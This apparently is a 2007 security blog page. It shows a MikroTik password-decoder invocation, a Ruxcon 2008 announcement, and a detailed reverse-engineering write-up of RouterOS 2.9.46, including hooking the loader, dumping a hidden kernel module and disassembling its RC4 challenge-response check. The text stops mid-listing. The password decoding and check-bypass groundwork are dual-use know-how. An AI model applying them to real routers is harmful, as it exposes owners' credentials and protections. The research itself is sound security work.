$ python mikrotik_password.py 29 de bf 06 49 5a 0e 2d 09 d5 fb 27 b1 44 ec 93 01 aaa
The password decoder can be found here for those who care.
I do not know if the encryption key changes on different releases of RouterOS, or if it is dependant upon license key or anything like that - this was coded with the information manio (lowercased upon his request) provided to me. manio said that he would investigate this when he gets a chance.
(added 20/11/2007)
Despite what many have thought, ruxcon will be making a comeback in 2008 :) Not too much has been planned at the moment, but by the looks of it, things are back on track. Somewhat recently, a ddos kiddie from South Australia packeted the box, causing the hosting provider to null route the ip… however that issue was sorted out.
I will be attempting to do a talk at ruxcon, not sure exactly what, but probably regarding hardened linux, and covering such things as PaX / grsecurity and other assorted things.
Depending on how things are going, I will probably set up a capture the flag game as well.
If you are interested in speaking at Ruxcon 2008, drop a note to chris@ruxcon.org.au indicating your interest.
Hope to see you all there :D
(started 28/8/2007, added 11/10/2007)
The MikroTik Wireless Router is a Linux embedded wireless router, focusing on various functionality such as bandwidth management, Firewalling, VPN server/client, and various other things. As with all embedded linux based software, it is interesting to pull it apart :)
It has been around for a while now… a couple of years ago when I analysed the software / pulling it apart, it had drivers/firmware to turn standard Orinoco wireless cards into an Access Point (which as far as I know isn't possible otherwise, at least not when I was looking at it.)
For the purposes of this article, I am looking at mikrotik-2.9.46.iso (MD5sum: 65aa908dd748ccf72ad9f588613dfe31, SHA1sum: 5e5ed13498db8d9745a701f75e58da3ef6701e58). For the most part, I have used QEMU to emulate the hardware/software environment to install it on. This has several advantages, such as being able to edit the "disk" it's using easily, amongst other things.
To perform more active analysis of the MikroTik components, we could copy the applicable binaries and associated libraries to another linux platform. This would allow us to strace the binary, debug it (which is incredibly useful for exploit development), and monitor the activities it performs in general. Furthermore, we can copy the kernel and applicable modules to perform further analysis on them, and to allow the environment to be replicated a lot better.
For this article, I have done a basic network install of Debian 4rc1. After performing the installation and installing a bunch of generic tools (strace/gdb/gcc/ltrace/openssh-server/nasm/etc), I then extracted the Mikrotik kernel and modules, and put the applicable files into their place.
[box] # wget http://felinemenace.org/~andrewg/MikroTik_Router_Security_Analysis_Part1/MikroTik-2.9.46-kernel-initrd.tgz
--08:58:00-- http://felinemenace.org/~andrewg/MikroTik_Router_Security_Analysis_Part1/MikroTik-2.9.46-kernel-initrd.tgz
=> `MikroTik-2.9.46-kernel-initrd.tgz'
Resolving felinemenace.org... 69.55.233.10
Connecting to felinemenace.org|69.55.233.10|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1,832,960 (1.7M) [application/x-gzip]
100%[====================================>] 1,832,960 327.68K/s ETA 00:00
08:58:06 (330.42 KB/s) - `MikroTik-2.9.46-kernel-initrd.tgz' saved [1832960/1832960]
[box] # tar xzf MikroTik-2.9.46-kernel-initrd.tgz
[box] # mv lib/modules/2.4.31/ /lib/modules/2.4.31
[box] # mv boot/vmlinuz /boot/vmlinuz-2.4.31
[box] # cd /boot/grub/
[box] # cat >>menu.lst <<_EOF_
> title MikroTik 2.4.31 / 2.9.46
> root (hd0,0)
> kernel /boot/vmlinuz-2.4.31
>
> _EOF_
[box] # sync ; reboot
While the QEMU image was rebooting, I wondered if it would work, due to differences in 2.6 and 2.4 kernels.. Firstly though, it appeared I may have to experiment with initrd images to load the applicable drivers for it and generally mess around as when booting it displayed:
Booting 'MikroTik 2.4.31 / 2.9.46'
root (hd0,0)
Filesystem type is ext2fs, partition type is 0x83
kernel /boot/vmlinuz-2.4.31
[Linux-bzImage, setup=0x1400, size=0xa044d]
Uncompressing Linux... Ok, booting the kernel.
Kernel panic: VFS: Unable to mount root fs on 09:00
Booting back into the standard Debian kernel:
[box] # cd /boot/ [box] # cp /root/boot/initrd.rgz mikro-initrd.rgz [box] # cd grub/ [box] # echo initrd /boot/mikro-initrd.rgz >>menu.lst [box] # sync ; reboot
Unfortunately, this gives a similar error message before. We know previously from mounting the mikrotik root filesystem it was ext3, but we can (attempt) to verify what filesystems they support. Looking over the original find output for the kernel modules, we don't see any filesystem modules for the default ext2 filesystem.
We can verify the filesystems supported by analysing the vmlinuz file. To summarise, basically, this file contains some bootup to get the machine into a decent state, a gzip decompression routine, and a heap of compressed data. The information we're interested in is in the compressed data, so we have to decompress it. As it's not a standard gzip file, we can't just run gunzip on it and be done with it, we need extract the compressed data.
Fortunately, this can be done rather easily because the the gzip header / magic bytes, which allows us to find suitable offsets to attempt decompression. The gzip magic bytes can be found by doing:
[box] # cd /tmp [box] # cp /etc/passwd . [box] # gzip passwd [box] # xxd passwd.gz | head 0000000: 1f8b 0808 2061 d346 0003 7061 7373 7764 .... a.F..passwd 0000010: 0065 93c1 6ec2 300c 86ef 3c05 c74d 0285 .e..n.0...<..M.. 0000020: 5260 90e3 3469 9771 d99e c06d 4289 d626 R`..4i.q...mB..& 0000030: 55d2 5278 fbd9 71a0 4593 adc8 7ffc 2536 U.Rx..q.E.....%6 0000040: 0ef5 ce75 f22a 5768 9e42 c16b 61ac 2820 ...u.*Wh.B.ka.( 0000050: 9c67 0a74 e32c 1219 5a12 a20f 5e04 4498 .g.t.,..Z...^.D. 0000060: 438a e2ab 5ca3 dd77 1fa9 700b 98ca d128 C...\..w..p....( 0000070: 124a 5f26 295b 626e 2377 db6d be91 514e .J_&)[bn#w.m..QN 0000080: cea2 9c55 d068 3abf 95bb 9564 11ab a730 ...U.h:....d...0 0000090: 5dd4 0095 dfc9 6c2d 2914 17f0 a284 f2ac ].....l-).......
For the purpose on hand, we'll use 0x1f8b as our marker.
[box] # xxd /boot/vmlinuz-2.4.31 | egrep "\b1f8b|1f\b \b8b" | head -n 5 00049a0: a9d0 0900 1f8b 0800 b533 bc46 0203 ec5d .........3.F...] 0004f20: 3613 e31f 8b6d a730 ef6f 1078 d415 4401 6....m.0.o.x..D. 001c6c0: 0a1f 8bab 69a2 a7e5 533b 4d60 764f 93bc ....i...S;M`vO.. 00381b0: c3ba d727 7964 631f 8baf 810c 2704 206f ...'ydc.....'. o 003fdf0: 972f d2d6 d50e 5d37 180b 771f 8bc5 b43d ./....]7..w....=
To extract the the compressed data from the vmlinuz-2.4.31 file, dd does the trick easily. We'll start from our first match and work our way down.
[box] # dd if=/boot/vmlinuz-2.4.31 of=vmlinuz.gz bs=1 skip=$((0x49a4)) 662093+0 records in 662093+0 records out 662093 bytes (662 kB) copied, 16.0954 seconds, 41.1 kB/s [box] # file vmlinuz.gz vmlinuz.gz: gzip compressed data, from Unix, last modified: Fri Aug 10 19:45:25 2007, max compression [box] # gunzip vmlinuz.gz [box] # strings -a vmlinuz ... skip ...
After seeing various ext2 related things, I realised it was probably a problem with something else. Reviewing grub's menu.lst, it becomes obvious:
title Debian GNU/Linux, kernel 2.6.18-5-686 root (hd0,0) kernel /boot/vmlinuz-2.6.18-5-686 root=/dev/hda1 ro initrd /boot/initrd.img-2.6.18-5-686 savedefault .... skip... title MikroTik 2.4.31 / 2.9.46 root (hd0,0) kernel /boot/vmlinuz-2.4.31 initrd /boot/mikro-initrd.rgz
The kernel line for the MikroTik entry misses out on some parameters. Fixing the applicable line, (kernel /boot/vmlinuz-2.4.31 root=/dev/hda1 ro single) and rebooting, it works. At least the decompressing of the kernel image can come in use for further investigation work. One last thing to note is that it requires the debian modutils package to work with 2.4 kernels.
Anyways, moving on, the debian image boots up and works reasonably with their kernel / modules. I had to load the ne2k-pci module manually (via modprobe ne2k-pci) to bring up networking under QEMU.
Another issue I had under the debian/mikrotik hybrid I created, was that the MikroTik kernel does not have AF_UNIX/AF_FILE support built-in, so useful programs like sysklogd and sshd would not run by default… However, it ships this as a module, so modprobe unix took care of this issue.
In order to run the MikroTik binaries (/nova/bin/), I needed to copy various files. I copied /nova/ over, and made a directory called /lib_mikro/ where I could copy various libary files over that resided in the /lib directory on the MikroTik installation.
In order to use these libraries in a non-standard directory location, the environment variable LD_LIBRARY_PATH can be set. This way only the applicable MikroTik binaries can be ran with correct library versions.
Doing some prelimiary analysis on the fileman binary shows that it appears to be expecting a network file descriptor on fd 3.
[box] $ LD_LIBRARY_PATH=/lib_mikro/ strace -f ./fileman
execve("./fileman", ["./fileman"], [/* 14 vars */]) = 0
uname({sys="Linux", node="debian", ...}) = 0
brk(0) = 0x805861c
...
rt_sigaction(SIGFPE, {0x4002c8ca, [], SA_RESTORER|SA_RESTART|SA_SIGINFO,
0x4009d4c0}, NULL, 8) = 0
getsockname(3, 0xbffffd18, [110]) = -1 EBADF (Bad file descriptor)
socket(PF_FILE, SOCK_STREAM, 0) = -1 EAFNOSUPPORT (Address family not
supported by protocol)
exit_group(1) = ?
Process 2147 detached
Unfortunately, debian's version of bash does not have /dev/tcp/ support, so unfortunately it's not as easy as nc -l 12121 on one terminal, and … ./fileman 3</dev/tcp/blah/.
After quickly writing some code to do what's needed, we can run fileman (and probably others). It's available here if you would like it. Usage is simple, python fd3.py <program to execute> <arguments for program>. Note that the first argument you specify for the program is argv[0] - not argv[1]. An example of a command line would be python fd3.py /usr/bin/strace strace -f /path/to/program.
Another issue appeared when trying to run fileman with a valid file descriptor on fd 3 - it wanted /tmp/novasock to be a valid file descriptor:
[box] $ LD_LIBRARY_PATH=/lib_mikro fd3 `which strace` strace -f ./fileman
getsockname(3, {sa_family=AF_INET, sin_port=htons(31313), sin_addr=inet_addr("192.168.254.3")}, [16]) = 0
socket(PF_FILE, SOCK_STREAM, 0) = 4
connect(4, {sa_family=AF_FILE, path="/tmp/novasock"}, 110) = -1 ENOENT (No such file or directory)
close(4) = 0
exit_group(1) = ?
Looking for /tmp/novasock we find the the loader binary seems to have what we're after:
[box] $ strings -f * | grep novasock loader: /tmp/novasock
Performing some initial analysis via strace on loader reveals an interesting / startling behaviour in loader:
[box] $ LD_LIBRARY_PATH=/lib_mikro strace -f ./loader
...
[pid 2361] create_module("qwink", 1430) = 0xc8831000
[pid 2361] init_module(0x80553fc, 134587376, umovestr: Input/output error
0xa7) = 0
[pid 2361] delete_module("qwink") = 0
...
The interesting thing about this particular piece of code is that it is loading a linux kernel module (LKM), and immediately removes the kernel module. This is particularly interesting as it would appear to be a kernel module that's meant to be out of sight.
To dump the module, we could hook init_module to perform our required actions, however, first we have to verify it's easily possible:
[box[ $ objdump -R loader | grep -i module [box] $
This is interesting, as it appears to not be importing the various module library calls, performing some more analysis:
[box] $ objdump -dtrs loader | grep module ... 804fb69: e8 3a 42 00 00 call 8053da8 <delete_module+0x336> 08053a20 <create_module>: 8053a36: 76 0c jbe 8053a44 <create_module+0x24> 08053a49 <init_module>: ...
The interesting thing about this output is the sections where the module names are surrounded by the angle brackets; this indicates that those functions exist in the .text of loader:
08053a49 <init_module>: 8053a49: 55 push %ebp 8053a4a: b8 80 00 00 00 mov $0x80,%eax 8053a4f: 89 e5 mov %esp,%ebp 8053a51: 53 push %ebx 8053a52: 8b 4d 0c mov 0xc(%ebp),%ecx 8053a55: 8b 5d 08 mov 0x8(%ebp),%ebx 8053a58: cd 80 int $0x80 8053a5a: 83 f8 82 cmp $0xffffff82,%eax 8053a5d: 89 c3 mov %eax,%ebx 8053a5f: 76 0c jbe 8053a6d <init_module+0x24> 8053a61: f7 db neg %ebx 8053a63: e8 54 70 ff ff call 804aabc <__errno_location@plt> 8053a68: 89 18 mov %ebx,(%eax) 8053a6a: 83 cb ff or $0xffffffff,%ebx 8053a6d: 89 d8 mov %ebx,%eax 8053a6f: 5b pop %ebx 8053a70: 5d pop %ebp 8053a71: c3 ret
This appears to be a standard implementation of the _syscallX() macros in the asm/unistd.h. While we're staring at objdump -d output, we may as well look at where this code is (statically) being called from:
8053ea6: ff 75 dc pushl 0xffffffdc(%ebp) 8053ea9: ff 35 20 64 05 08 pushl 0x8056420 8053eaf: e8 95 fb ff ff call 8053a49 <init_module>
At 0x8053ea9 it pushes a static address (0x8056420) which does not correspond to our strace output. Having a brief look at where that variable is used before hand:
[box] $ objdump -dtrsRS loader | grep -C 2 8056420 ... 8053db4: 83 ec 18 sub $0x18,%esp 8053db7: c7 45 f0 00 00 00 00 movl $0x0,0xfffffff0(%ebp) 8053dbe: 8b 3d 20 64 05 08 mov 0x8056420,%edi 8053dc4: ba 10 00 00 00 mov $0x10,%edx 8053dc9: f2 ae repnz scas %es:(%edi),%al -- 8053e19: e8 3e 70 ff ff call 804ae5c <memcpy@plt> 8053e1e: 53 push %ebx 8053e1f: ff 35 20 64 05 08 pushl 0x8056420 8053e25: 56 push %esi 8053e26: e8 31 70 ff ff call 804ae5c <memcpy@plt> 8053e2b: ff 75 ec pushl 0xffffffec(%ebp) 8053e2e: ff 35 20 64 05 08 pushl 0x8056420 8053e34: e8 e7 fb ff ff call 8053a20 <create_module> 8053e39: 83 c4 24 add $0x24,%esp -- 8053ea1: e8 57 fd ff ff call 8053bfd <delete_module+0x18b> 8053ea6: ff 75 dc pushl 0xffffffdc(%ebp) 8053ea9: ff 35 20 64 05 08 pushl 0x8056420 8053eaf: e8 95 fb ff ff call 8053a49 <init_module> 8053eb4: 83 c4 10 add $0x10,%esp -- 8053ee0: 83 c4 0c add $0xc,%esp 8053ee3: 8b 55 f0 mov 0xfffffff0(%ebp),%edx 8053ee6: ff 35 20 64 05 08 pushl 0x8056420 8053eec: 39 c2 cmp %eax,%edx 8053eee: 0f 94 c3 sete %bl
So, it appears it's used a bit to set it up. Being the somewhat lazy type, it would be easy enough to write a dynamic library to modify the .text segment to insert a hook. The mechanisms used for this is discussed in a paper I wrote available here.
The hook code aim is simple, which is to dump the applicable information sent to init_module. It also appears that the init_module function declaration changes between 2.4 and 2.6 kernel versions:
*`int init_module(const char *name, struct module *image);` .2.6: * `long sys_init_module (void *umod, unsigned long len, const char *uargs);`
The strace output above is for 2.6, not 2.4. After locating a suitable 2.4 init_module man page, we see that the second parameter is a pointer to a structure:
The module image begins with a module structure and is followed by code and data as appropriate. The module structure is defined as follows:
struct module {
unsigned long size_of_struct;
struct module *next;
const char *name;
unsigned long size;
long usecount;
unsigned long flags;
unsigned int nsyms;
unsigned int ndeps;
struct module_symbol *syms;
struct module_ref *deps;
struct module_ref *refs;
int (*init)(void);
void (*cleanup)(void);
const struct exception_table_entry *ex_table_start;
const struct exception_table_entry *ex_table_end;
#ifdef __alpha__
unsigned long gp;
#endif
};
At least the required information is available to make it easier. After writing the required the code (which is available here)
Running our hooking library code (which is available , we get:
[box] $ LD_LIBRARY_PATH=/lib_mikro LD_PRELOAD=/tmp/hook-loader.so ./loader forked creating loader --> In an int3 handler --> Create module return address is 0xc8831000 --> In an int3 handler --> working our magic for qwink
Matching the dumped header information with the struct module output, we get:
[box] $ xxd /tmp/module_header 0000000: 3c00 0000 0000 0000 9015 83c8 9605 0000 <............... 0000010: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0000020: 0000 0000 0000 0000 0000 0000 4010 83c8 ............@... 0000030: 0000 0000 0000 0000 0000 0000 ............ ... matching up with the above struct module ... size_of_struct: 0x0000003c (0x0000) next: NULL (0x0004) name: 0xc8831590 (0x0008) size: 0x00000596 (0x000c) usecount: NULL (0x0010) flags: 0 (0x0014) nsyms: 0 (0x0018) ndeps: 0 (0x001c) syms: NULL (0x0020) deps: NULL (0x0024) refs: NULL (0x0028) init: 0xc8831040 (0x002c) cleanup: NULL (0x0030) ex_table_start: NULL (0x0034) ex_table_end: NULL (0x0038)
So, our output in /tmp/module_text starts at 0xc883103c, and is 1430 bytes long. Disassembling the binary dump in /tmp/module_text, looking for the init function pointer that gets called:
[box] $ ndisasm -b 32 -o $((0xc883103c)) /tmp/module_text ... C8831040 83EC18 sub esp,byte +0x18 C8831043 53 push ebx C8831044 E8F7040000 call 0xc8831540 C8831049 8D5818 lea ebx,[eax+0x18] C883104C C7430400000000 mov dword [ebx+0x4],0x0 C8831053 C7401800000000 mov dword [eax+0x18],0x0 ...
We can combine the gdb debugging functionality in qemu in conjunction with a disassembler such as IDA Pro , we can use the gdb stub functionality of qemu, we can disassemble and follow what is happening when the init code is executed.
Testing our analysis against the init function by setting break points on:
0xc053ffd0
0xc8831040
Just to make sure we catch everything.. I don't expect 0xc053ffd0 to be hit, but it is a valid kernel address :)
Testing the theory out under gdb/qemu doesn't pan out how it was expected to be:
(gdb) break *0xc053ffd0 Breakpoint 4 at 0xc053ffd0 (gdb) break *0xc8831040 Breakpoint 5 at 0xc8831040 (gdb) c Continuing. ... Run the loader program ... Breakpoint 5, 0xc8831040 in ?? () (gdb) x/10i $eip 0xc8831040: sub $0x18,%esp 0xc8831043: push %ebx 0xc8831044: call 0xc8831540 0xc8831049: lea 0x18(%eax),%ebx 0xc883104c: movl $0x0,0x4(%ebx) 0xc8831053: movl $0x0,0x18(%eax) 0xc883105a: mov 0xc0252024,%eax 0xc883105f: inc %eax 0xc8831060: mov %eax,0x8(%ebx) 0xc8831063: call 0xc8831090 (gdb) i r ebx ebx 0xc8831000 -930934784
Now that we're able to trace this code, we should work out what information would be desirable to make this process far easier:
Ideally, I'd love a complete, working System.map, however, looking at the files available, it doesn't appear to be available. Scratching that one off, we get:
Use symbols provided by /proc/ksyms to help our reversing effort. That's a useful start, but provides a limited view of what is available.
Another couple of things we could try to help our reversing efforts:
Compile a custom kernel similar to theres as possible, with same compiler / distro. Once it's been compiled, we can extract function signatures from the vmlinux file, and attempt to apply it to the extracted image.
[box] $ cat /proc/version Linux version 2.4.31 (build@builder2) (gcc version 2.95.4 20011002 (Debian prerelease)) #1 Fri Aug 10 12:43:55 EEST 2007
After some researching, it was determined that the gcc version 2.95.4 20011002 is available if a default install of Debian 3.0r1 is installed. I only needed cd1 and cd2 from the set of cd's to install the required tools.
After performing a compile of the default kernel configuration shipped in 2.4.31 sans PCMCIA support, I used the 2pelf tool available here to generate the signatures off the .o files in the linux tree, then used the IDA tool sigmake to generate the signature information. (I love bash scripting to automate these tasks).
If needed, the signatures could be regenerated several times with different compilation parameters in order to increase success of signature matching.
Since it would be helpful to have a full kernel text image in IDA Pro, we can use the memsave function in QEMU to generate an appropriate memory dump. To get the most useful memory dump, I'll generate the dump when qemu has hit the breakpoint on the "qwink" init function.
The vmlinux file generated when I compiled the 2.4.31 kernel indicated that the kernel got loaded at 0xc0100000, so we'll dump from there to 0xd0000000… This actually turned out to be a bad idea, as IDA couldn't analyse such large files. After some experimentation and looking at the output of objdump -fp on the compiled vmlinux file, I dumped from 0xc0100000 to 0xc1000000.
(qemu) memsave 3222274048 15728640 d *pause* (qemu)
The first number is 0xc0100000 and the second is 0xc1000000 - 0xc0100000.
After dumping the kernel memory to disk, then loading it into IDA, and applying the signatures that was generated before, we see a lot of function names pop up. Sometimes they're correct, sometimes they don't appear to be, sometimes they don't find functions we find interesting, but in general they save us a lot of work :)
The init code is as follows from IDA:
seg001:C8831040 module_init_code: seg001:C8831040 sub esp, 18h seg001:C8831043 push ebx seg001:C8831044 call GET_C8831550 ; eax = 0xc8831550 seg001:C8831049 lea ebx, [eax+18h] ; ebx = eax + 0x18 = 0xc8831568, this is struct timer_list data seg001:C883104C mov dword ptr [ebx+4], 0 ; sets next pointer to null seg001:C8831053 mov dword ptr [eax+18h], 0 ; sets prev pointer to null ? seg001:C883105A mov eax, ds:jiffies seg001:C883105F inc eax ; schedules the code to be executed in one jiffie seg001:C8831060 mov [ebx+8], eax ; sets the scheduler expires seg001:C8831063 call GET_C88310a0 seg001:C8831068 mov [ebx+10h], eax ; function pointer used (execd_by_timer) below seg001:C883106B mov eax, 0FFFFE000h seg001:C8831070 and eax, esp ; get current seg001:C8831072 mov [ebx+0Ch], eax ; data pointer for call back. current task seg001:C8831075 add esp, -0Ch ; no idea what it's doing here. possibly aligning stack to paragraph boundary? seg001:C8831078 mov eax, offset add_timer seg001:C883107D push ebx ; push offset to struct timer_list data seg001:C883107E call eax ; add_timer seg001:C8831080 xor eax, eax ; return NULL seg001:C8831082 add esp, 10h seg001:C8831085 pop ebx seg001:C8831086 add esp, 18h seg001:C8831089 retn
I discovered the mov eax, offset 0xc011b170 / call eax was the function add_timer based on the string "bug: kernel added timer twice at %p.\n" and then grep'ing the kernel source tree for added timer twice at, which lead me to kernel/timer.c.
I discovered 0xc0252024 was the jiffies variable by cross referencing where that variable was used, and looking for some identifable charactistics. I found what I was looking with a little bit of reverse engineering, and cross referencing what was found with the linux kernel code that I had available to identify the variable name.
Cross referencing structures once they were discovered helped things a lot. (For example, the struct timer).
After following through the code that would be executed by the timer code, it appeared to be generating a rc4 key, and then generating a 4 byte value, and then calling access_process_vm to write 4 bytes based on the values passed in. Luckily the function signatures generated earlier identified the access_process_vm function for me, and saved a fair amount of effort.
QEMU's breakpoints come in use for following this in gdb.
Having a look at the IDA loader binary, we see:
.text:08053DA8 load_module_into_kernel proc near ; CODE XREF: sub_804DD20+25p .text:08053DA8 ; sub_804F572+10Dp ... .text:08053DA8 .text:08053DA8 constructed_image= dword ptr -24h .text:08053DA8 roundup_size = dword ptr -20h .text:08053DA8 start_of_module_data= dword ptr -18h .text:08053DA8 total_size = dword ptr -14h .text:08053DA8 kernel_modified_variable= dword ptr -10h .text:08053DA8 var_C = dword ptr -0Ch .text:08053DA8 tv_usecs_challenge= dword ptr 8 .text:08053DA8 .text:08053DA8 push ebp .text:08053DA9 cld ; clear direction flag .text:08053DAA mov ebp, esp .text:08053DAC push edi .text:08053DAD xor eax, eax .text:08053DAF push esi .text:08053DB0 or ecx, 0FFFFFFFFh .text:08053DB3 push ebx .text:08053DB4 sub esp, 18h .text:08053DB7 mov [ebp+kernel_modified_variable], 0 ; initialise the variable written to by access_process_vm to 0 .text:08053DBE mov edi, module_name .text:08053DC4 mov edx, 10h .text:08053DC9 repne scasb .text:08053DCB mov ebx, ecx .text:08053DCD mov eax, 3Ch .text:08053DD2 not ebx ; embedded strlen() .text:08053DD4 call sub_8053D95 ; calcuate if additional space is needed in a memory copy later on .text:08053DD9 mov [ebp+roundup_size], eax ; save the calcutation for later use .text:08053DDC lea edx, [eax+ebx+1360] ; calcuate total size needed, + 1360 .text:08053DE3 push edx ; size .text:08053DE4 mov [ebp+total_size], edx .text:08053DE7 call _malloc ; allocate the required space .text:08053DEC mov [ebp+constructed_image], eax ; save the results of malloc() .text:08053DEF mov ecx, [ebp+total_size] .text:08053DF2 cld ; clear direction flag .text:08053DF3 mov edi, eax .text:08053DF5 xor eax, eax ; write nulls .text:08053DF7 rep stosb ; embedded memset .text:08053DF9 push 510h ; size_t .text:08053DFE mov edi, [ebp+constructed_image] ; get the allocated memory .text:08053E01 add edi, [ebp+roundup_size] ; move past the module structure .text:08053E04 push offset module_init_code ; void * .text:08053E09 lea edx, [edi+510h] ; edx now points PAST the module_init_code and all that .text:08053E0F push edi ; void * .text:08053E10 lea esi, [edi+1360] ; esi = module name pointer .text:08053E16 mov [ebp+start_of_module_data], edx .text:08053E19 call _memcpy ; copy the module_init_code (of length 0x510) .text:08053E19 ; to the allocated memory .text:08053E1E push ebx ; size_t. this is calcuated previously from strlen(module_name) .text:08053E1F push module_name ; void * .text:08053E25 push esi ; points to module name .text:08053E26 call _memcpy ; setup module name .text:08053E2B push [ebp+total_size] ; int .text:08053E2E push module_name ; name .text:08053E34 call create_module .text:08053E39 add esp, 24h .text:08053E3C cmp eax, 0FFFFFFFFh ; eax contains base of the allocated kernel memory .text:08053E3F jnz short loc_8053E48 .text:08053E41 push offset aFailedToCreate ; "failed to create module" .text:08053E46 jmp short loc_8053EC0 .text:08053E48 ; --------------------------------------------------------------------------- .text:08053E48 .text:08053E48 loc_8053E48: ; CODE XREF: load_module_into_kernel+97j .text:08053E48 mov ecx, [ebp+constructed_image] .text:08053E4B mov dword ptr [ecx], 3Ch ; set size of module header to 0x3c .text:08053E51 mov ecx, [ebp+roundup_size] .text:08053E54 lea edx, [eax+ecx] ; edx = start of module code, in kernel space .text:08053E57 mov ecx, [ebp+constructed_image] .text:08053E5A lea eax, [edx+1360] ; eax = end of module code, start of "qwink" .text:08053E60 mov [ecx+2Ch], edx ; set module size .text:08053E63 mov edx, [ebp+tv_usecs_challenge] ; arg_0 = tv.tv_usecs ? .text:08053E66 mov [ecx+8], eax ; write the name pointer, points to end of module, "qwink" .text:08053E69 mov eax, [ebp+total_size] .text:08053E6C mov [edi+510h], edx ; write challenge to kernel image (data section) .text:08053E72 mov [ecx+0Ch], eax ; write size of complete module to header .text:08053E75 mov ecx, [ebp+start_of_module_data] .text:08053E78 mov eax, kernel_ptr_c0105000 .text:08053E7D mov [ecx+4], eax .text:08053E80 mov eax, dword_8056A68 ; some mystical value .text:08053E85 mov [ecx+8], eax .text:08053E88 mov eax, dword_8056A6C ; 0x3f .text:08053E8D mov [ecx+0Ch], eax .text:08053E90 lea eax, [ebp+kernel_modified_variable] ; get the address of the variable .text:08053E93 mov [ecx+10h], eax ; variable that is going to be written to .text:08053E96 call alloc_rc4_t .text:08053E9B push [ebp+start_of_module_data] .text:08053E9E mov esi, eax .text:08053EA0 push eax .text:08053EA1 call rc4_init_key_encrypt ; (rc4_t, start_of_module_data) .text:08053EA6 push [ebp+constructed_image] ; image .text:08053EA9 push module_name ; name .text:08053EAF call init_module .text:08053EB4 add esp, 10h .text:08053EB7 test eax, eax .text:08053EB9 jz short loc_8053EC9 .text:08053EBB push offset aFailedToLoadMo ; "failed to load module" .text:08053EC0 .text:08053EC0 loc_8053EC0: ; CODE XREF: load_module_into_kernel+9Ej .text:08053EC0 call _puts .text:08053EC5 xor eax, eax .text:08053EC7 jmp short loc_8053EFE .text:08053EC9 ; --------------------------------------------------------------------------- .text:08053EC9 .text:08053EC9 loc_8053EC9: ; CODE XREF: load_module_into_kernel+111j .text:08053EC9 ; load_module_into_kernel+126_j .text:08053EC9 mov eax, [ebp+kernel_modified_variable] .text:08053ECC test eax, eax .text:08053ECE jz short loc_8053EC9 ; while the variable hasn't been modified, loop. Ugh. .text:08053ED0 push offset unk_8056960 ; not sure yet .text:08053ED5 xor ebx, ebx .text:08053ED7 push [ebp+tv_usecs_challenge] ; challenge .text:08053EDA push esi ; rc4 structure, returned from rc4_init .text:08053EDB call check_challenge_response .text:08053EE0 add esp, 0Ch .text:08053EE3 mov edx, [ebp+kernel_modified_variable] .text:08053EE6 push module_name ; name .text:08053EEC cmp edx, eax ; result from check_challenge_response .text:08053EEE setz bl ; set return code if they're the same .text:08053EF1 call delete_module .text:08053EF6 push esi .text:08053EF7 call free_rc4_t_tailcall .text:08053EFC mov eax, ebx ; set return value (based on check_challenge_response) .text:08053EFE .text:08053EFE loc_8053EFE: ; CODE XREF: load_module_into_kernel+11Fj .text:08053EFE lea esp, [ebp-0Ch] .text:08053F01 pop ebx .text:08053F02 pop esi .text:08053F03 pop edi .text:08053F04 pop ebp .text:08053F05 retn .text:08053F05 load_module_into_kernel endp .text:08053F05
.text:08053CEA check_challenge_response proc near ; CODE XREF: load_module_into_kernel+133p .text:08053CEA .text:08053CEA local_rc4_structure= dword ptr -14h .text:08053CEA challenge_copy = dword ptr -10h .text:08053CEA var_C = dword ptr -0Ch .text:08053CEA rc4_t = dword ptr 8 .text:08053CEA challenge = dword ptr 0Ch .text:08053CEA unknown_data = dword ptr 10h .text:08053CEA .text:08053CEA push ebp .text:08053CEB mov ebp, esp .text:08053CED push edi .text:08053CEE push esi .text:08053CEF xor esi, esi .text:08053CF1 push ebx .text:08053CF2 push ecx .text:08053CF3 push ecx .text:08053CF4 mov edi, [ebp+rc4_t] .text:08053CF7 mov eax, [ebp+challenge] .text:08053CFA push edi .text:08053CFB mov [ebp+challenge_copy], eax .text:08053CFE call rc4_dup_struct .text:08053D03 mov [ebp+local_rc4_structure], eax ; duplicated structure .text:08053D06 mov eax, [ebp+unknown_data] .text:08053D09 push dword ptr [eax+100h] ; offset in 256 bytes .text:08053D0F push edi ; rc4 structure passed in .text:08053D10 call rc4_set_key .text:08053D15 add esp, 0Ch .text:08053D18 .text:08053D18 loc_8053D18: ; CODE XREF: check_challenge_response+91j .text:08053D18 push edi .text:08053D19 call rc4_get_byte .text:08053D1E mov edx, [ebp+local_rc4_structure] .text:08053D21 mov bl, al ; gets a byte from the rc4 structure which was passed in (and initialised later on) .text:08053D23 mov ecx, esi ; esi is a loop counter .text:08053D25 and ecx, 3 ; index into key material .text:08053D28 movzx eax, byte ptr [edx+esi] ; index into the duplicated structure .text:08053D2C mov edx, [ebp+unknown_data] .text:08053D2F movzx eax, byte ptr [edx+eax] ; get a byte of the unknown data .text:08053D33 pop edx ; edx = local rc4 structure .text:08053D34 mov edx, ebx ; get the byte that was generated via rc4_get_byte .text:08053D36 and edx, 3 ; perform a switch on the last 4 bytes .text:08053D39 cmp edx, 1 .text:08053D3C jz short loc_8053D5A .text:08053D3E jg short loc_8053D46 .text:08053D40 test edx, edx .text:08053D42 jz short loc_8053D52 .text:08053D44 jmp short loc_8053D74 .text:08053D46 ; --------------------------------------------------------------------------- .text:08053D46 .text:08053D46 loc_8053D46: ; CODE XREF: check_challenge_response+54j .text:08053D46 cmp edx, 2 .text:08053D49 jz short loc_8053D62 .text:08053D4B cmp edx, 3 .text:08053D4E jz short loc_8053D6A .text:08053D50 jmp short loc_8053D74 .text:08053D52 ; --------------------------------------------------------------------------- .text:08053D52 .text:08053D52 loc_8053D52: ; CODE XREF: check_challenge_response+58j .text:08053D52 xor al, bl .text:08053D54 add byte ptr [ebp+ecx+challenge_copy], al .text:08053D58 jmp short loc_8053D74 .text:08053D5A ; --------------------------------------------------------------------------- .text:08053D5A .text:08053D5A loc_8053D5A: ; CODE XREF: check_challenge_response+52j .text:08053D5A add al, bl .text:08053D5C xor byte ptr [ebp+ecx+challenge_copy], al .text:08053D60 jmp short loc_8053D74 .text:08053D62 ; --------------------------------------------------------------------------- .text:08053D62 .text:08053D62 loc_8053D62: ; CODE XREF: check_challenge_response+5Fj .text:08053D62 xor bl, byte ptr [ebp+ecx+challenge_copy] .text:08053D66 add al, bl .text:08053D68 jmp short loc_8053D70 .text:08053D6A ; 